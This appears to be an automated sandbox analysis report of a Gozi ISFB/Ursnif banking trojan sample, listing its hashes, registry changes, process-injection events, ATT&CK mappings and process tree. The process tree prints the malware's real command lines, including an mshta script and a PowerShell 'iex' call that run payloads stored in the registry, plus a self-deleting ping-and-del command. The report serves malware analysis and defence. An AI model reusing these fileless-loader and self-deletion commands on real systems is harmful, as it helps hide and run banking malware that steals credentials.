gozi_ifsb | d5ccf9039136d23649240cd3879f6e9d40dae0dff2a5cfcdefc8535f93587c38

Analysis

max time kernel
101s
max time network
130s
platform
windows7_x64
resource
win7v200430
submitted
13-07-2020 17:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3.exe
Size

142KB
MD5

5105430437588f8878da6957bc8c3119
SHA1

818651e37ef71701165c3eb03c5c1813c1047b32
SHA256

d5ccf9039136d23649240cd3879f6e9d40dae0dff2a5cfcdefc8535f93587c38
SHA512

3149a53bc48feea00ce6067cf5bbe94ae5b65e933ffdd5ae4139d217c2e7e7e65fa636ab021d9a374e091a791c952e6f995e6cb923ddbfcc33d4d1e575e528b1

Score

10^/10

banker trojan gozi_ifsb ursnif spyware evasion

Malware Config

Signatures

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
240	iexplore.exe
240	iexplore.exe
1536	IEXPLORE.EXE
1536	IEXPLORE.EXE
240	iexplore.exe
240	iexplore.exe
1000	IEXPLORE.EXE
1000	IEXPLORE.EXE
240	iexplore.exe
240	iexplore.exe
1536	IEXPLORE.EXE
1536	IEXPLORE.EXE

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 872 set thread context of 1304	872	powershell.exe	20
PID 1304 set thread context of 240	1304	Explorer.EXE	25
PID 1304 set thread context of 2040	1304	Explorer.EXE	40
PID 2040 set thread context of 1600	2040	cmd.exe	42

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1600	PING.EXE

Modifies Internet Explorer settings 1 TTPs 42 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 906c18804859d601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab31238800000000020000000000106600000001000020000000c7be896d28006ce0c706bc6e65a0d8270227aefca443bb0ba5105c73ff1b3068000000000e8000000002000020000000f030f38f8d145339029ecacedb913931934f9a08daded8a5c31cbf0388732037900000007d52e82ef2b5eaf668228dd019111944f71e3fc254cab0c0e71697672616c93834463723b7d2e2141daa67621b774de76892b119f47e0294e4eeb5850d9f81afc094e53f467c4b6b73ff688637e87bfde6730499f9eef66cc122a38af128a8b23aa08cb74d782797b6848f86e44cdf56ee3216ce9a12602027737228ed107ea2b0e7a1b600fae2914fd8cb0672ad548f400000003dfe5523a732f510ce3291581e9b51ea62ceb113327e702ab4ab798e82df837829c686df04b3816c5abceb31c2c05fa9cc15169c02e87be1acdb1e8d275c1380	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab312388000000000200000000001066000000010000200000005da6adb6e1f4db5f804f3a1fb01ab155aa4219f346750a3c99ababc2ca964466000000000e8000000002000020000000ee14f7865e561a9137d55e8ac3a823e812114790a8fe1fdf8281c86e18da6ee620000000f0562915cdf1035c903ba219b2f2e5249d601156430ef58147ea2655a89606594000000051a8b4e0e9448c444c4abc48e1595fc8d00dc1f6e69a81d2591d5444443623dc4f0e4a7274482c0b2323b2bbeb05cbae6a8f0765a84960c589be7575128c79ba	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B8A0B681-C53B-11EA-9064-7216F48E0260} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "301432063"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe

Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 240 wrote to memory of 1536	240	iexplore.exe	27
PID 240 wrote to memory of 1536	240	iexplore.exe	27
PID 240 wrote to memory of 1536	240	iexplore.exe	27
PID 240 wrote to memory of 1536	240	iexplore.exe	27
PID 240 wrote to memory of 1000	240	iexplore.exe	29
PID 240 wrote to memory of 1000	240	iexplore.exe	29
PID 240 wrote to memory of 1000	240	iexplore.exe	29
PID 240 wrote to memory of 1000	240	iexplore.exe	29
PID 1952 wrote to memory of 872	1952	mshta.exe	32
PID 1952 wrote to memory of 872	1952	mshta.exe	32
PID 1952 wrote to memory of 872	1952	mshta.exe	32
PID 872 wrote to memory of 1784	872	powershell.exe	36
PID 872 wrote to memory of 1784	872	powershell.exe	36
PID 872 wrote to memory of 1784	872	powershell.exe	36
PID 1784 wrote to memory of 1600	1784	csc.exe	37
PID 1784 wrote to memory of 1600	1784	csc.exe	37
PID 1784 wrote to memory of 1600	1784	csc.exe	37
PID 872 wrote to memory of 1628	872	powershell.exe	38
PID 872 wrote to memory of 1628	872	powershell.exe	38
PID 872 wrote to memory of 1628	872	powershell.exe	38
PID 1628 wrote to memory of 1640	1628	csc.exe	39
PID 1628 wrote to memory of 1640	1628	csc.exe	39
PID 1628 wrote to memory of 1640	1628	csc.exe	39
PID 872 wrote to memory of 1304	872	powershell.exe	20
PID 872 wrote to memory of 1304	872	powershell.exe	20
PID 872 wrote to memory of 1304	872	powershell.exe	20
PID 1304 wrote to memory of 240	1304	Explorer.EXE	25
PID 1304 wrote to memory of 2040	1304	Explorer.EXE	40
PID 1304 wrote to memory of 2040	1304	Explorer.EXE	40
PID 1304 wrote to memory of 2040	1304	Explorer.EXE	40
PID 1304 wrote to memory of 2040	1304	Explorer.EXE	40
PID 1304 wrote to memory of 240	1304	Explorer.EXE	25
PID 1304 wrote to memory of 240	1304	Explorer.EXE	25
PID 1304 wrote to memory of 2040	1304	Explorer.EXE	40
PID 1304 wrote to memory of 2040	1304	Explorer.EXE	40
PID 2040 wrote to memory of 1600	2040	cmd.exe	42
PID 2040 wrote to memory of 1600	2040	cmd.exe	42
PID 2040 wrote to memory of 1600	2040	cmd.exe	42
PID 2040 wrote to memory of 1600	2040	cmd.exe	42
PID 2040 wrote to memory of 1600	2040	cmd.exe	42
PID 2040 wrote to memory of 1600	2040	cmd.exe	42
PID 1304 wrote to memory of 1812	1304	Explorer.EXE	43
PID 1304 wrote to memory of 1812	1304	Explorer.EXE	43
PID 1304 wrote to memory of 1812	1304	Explorer.EXE	43
PID 1304 wrote to memory of 1640	1304	Explorer.EXE	44
PID 1304 wrote to memory of 1640	1304	Explorer.EXE	44
PID 1304 wrote to memory of 1640	1304	Explorer.EXE	44
PID 1640 wrote to memory of 328	1640	cmd.exe	47
PID 1640 wrote to memory of 328	1640	cmd.exe	47
PID 1640 wrote to memory of 328	1640	cmd.exe	47
PID 1812 wrote to memory of 1504	1812	cmd.exe	48
PID 1812 wrote to memory of 1504	1812	cmd.exe	48
PID 1812 wrote to memory of 1504	1812	cmd.exe	48
PID 1304 wrote to memory of 1576	1304	Explorer.EXE	49
PID 1304 wrote to memory of 1576	1304	Explorer.EXE	49
PID 1304 wrote to memory of 1576	1304	Explorer.EXE	49

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	872	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
872	powershell.exe
1304	Explorer.EXE
1304	Explorer.EXE
2040	cmd.exe

Deletes itself 1 IoCs

pid	Process
2040	cmd.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1304	Explorer.EXE
1304	Explorer.EXE
1304	Explorer.EXE
1304	Explorer.EXE

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
240	iexplore.exe
240	iexplore.exe
240	iexplore.exe
1304	Explorer.EXE
1304	Explorer.EXE
1304	Explorer.EXE
1304	Explorer.EXE
1304	Explorer.EXE

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
872	powershell.exe
872	powershell.exe
1304	Explorer.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1600	PING.EXE

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Explorer.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SendNotifyMessage
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: EnumeratesProcesses
- Checks whether UAC is enabled
PID:1304
- C:\Users\Admin\AppData\Local\Temp\3.exe
  "C:\Users\Admin\AppData\Local\Temp\3.exe"
  2⤵
  PID:1296
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05\\\Efsltprf'));if(!window.flag)close()</script>"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05").dmrctcls))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: MapViewOfSection
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in System32 directory
    PID:872
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iadislf5\iadislf5.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1784
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF601.tmp" "c:\Users\Admin\AppData\Local\Temp\iadislf5\CSC629350CE14E243E6892C9CE41F5165EF.TMP"
        5⤵
        
        PID:1600
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p2mzmmoo\p2mzmmoo.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF68E.tmp" "c:\Users\Admin\AppData\Local\Temp\p2mzmmoo\CSC70BB0F5D930B414C93F33B0C1136EAA.TMP"
        5⤵
        
        PID:1640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\3.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: MapViewOfSection
  - Deletes itself
  PID:2040
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1600
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\28DC.bi1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:1504
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2894.bi1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:328
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2894.bi1"
  2⤵
  PID:1576

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
PID:240
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:240 CREDAT:275457 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1536
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:240 CREDAT:209928 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1296-0-0x0000000000D59000-0x0000000000D6A000-memory.dmp

Filesize
68KB

Download
memory/1296-1-0x0000000000E50000-0x0000000000E61000-memory.dmp

Filesize
68KB

Download